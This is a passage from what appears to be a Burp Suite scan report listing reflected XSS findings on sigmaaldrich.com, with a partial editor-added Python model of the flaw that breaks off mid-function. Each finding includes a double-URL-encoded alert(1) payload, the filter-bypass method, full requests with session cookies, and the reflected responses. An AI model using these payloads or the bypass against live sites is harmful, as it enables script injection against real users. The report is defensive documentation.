Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:46 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc694f6";alert(1)//3ccebd517b4/medialib/labware/labware-icons/cell-culture","E404") ;
   </script>
...[SNIP]...

1.349. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa3b1%2522%253balert%25281%2529%252f%252fb095cfc68d was submitted in the REST URL parameter 2. This input was echoed as fa3b1";alert(1)//b095cfc68d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibfa3b1%2522%253balert%25281%2529%252f%252fb095cfc68d/labware/labware-icons/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:48 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibfa3b1";alert(1)//b095cfc68d/labware/labware-icons/cell-culture","E404") ;
   </script>
...[SNIP]...

1.350. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ade4%2522%253balert%25281%2529%252f%252f9e3f364d8a5 was submitted in the REST URL parameter 3. This input was echoed as 6ade4";alert(1)//9e3f364d8a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware6ade4%2522%253balert%25281%2529%252f%252f9e3f364d8a5/labware-icons/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware6ade4";alert(1)//9e3f364d8a5/labware-icons/cell-culture","E404") ;
   </script>
...[SNIP]...

1.351. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e91f%2522%253balert%25281%2529%252f%252f9ee11522f95 was submitted in the REST URL parameter 4. This input was echoed as 4e91f";alert(1)//9ee11522f95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons4e91f%2522%253balert%25281%2529%252f%252f9ee11522f95/cell-culture HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:51 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons4e91f";alert(1)//9ee11522f95/cell-culture","E404") ;
   </script>
...[SNIP]...

1.352. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/cell-culture [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/cell-culture

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11622%2522%253balert%25281%2529%252f%252fd1ea5e37e15 was submitted in the REST URL parameter 5. This input was echoed as 11622";alert(1)//d1ea5e37e15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/cell-culture11622%2522%253balert%25281%2529%252f%252fd1ea5e37e15 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:53 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/cell-culture11622";alert(1)//d1ea5e37e15","E404") ;
   </script>
...[SNIP]...

1.353. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/centrifugation [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/centrifugation

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adc0e%2522%253balert%25281%2529%252f%252f1839ef392e4 was submitted in the REST URL parameter 1. This input was echoed as adc0e";alert(1)//1839ef392e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
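Worked example (added by the editor; it is not part of the Burp output and not code from the Sigma-Aldrich application). Every finding in this section, 1.347 through 1.353, relies on the same decode chain, so one model serves them all: the web server decodes the path once, a character filter sees %22 and lets it through, the application decodes a second time and the resulting quote closes the first argument of cmCreateErrorTag in the 404 page. The script below reproduces that chain against the payload from finding 1.347, shows why the single-encoded form of the same payload is caught, and implements the two remediations stated above (decode once; emit the value as an escaped JS string literal). The set of filtered characters, the URL prefix constant and all function names are assumptions made for the illustration; the path segment and the expected echoed line are copied from finding 1.347.

```python
# Added example, not from the Burp report or the target application.
# Models the double-URL-decode path behind findings 1.347-1.353 and the
# two fixes the remediation text recommends.
from urllib.parse import unquote
import json

# Constructed from finding 1.347: the last path segment as sent on the wire.
RAW_PATH_SEGMENT = "bottles9e058%2522%253balert%25281%2529%252f%252f243d8772e"

# Prefix the 404 page puts in front of the echoed path (taken from the
# response shown for finding 1.347).
URL_PREFIX = "http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/"

# Assumption: the characters the application's filter rejects. The report only
# says it "attempts to block certain characters"; this set is illustrative.
BLOCKED_CHARS = set('<>"\'')


def naive_filter_ok(value: str) -> bool:
    """Validation the way the vulnerable path appears to run it: on the value
    after the web server's single decode, before the application decodes again."""
    return not any(ch in BLOCKED_CHARS for ch in value)


def vulnerable_render(raw_segment: str) -> str:
    """Web server decodes once, filter runs, application decodes a second
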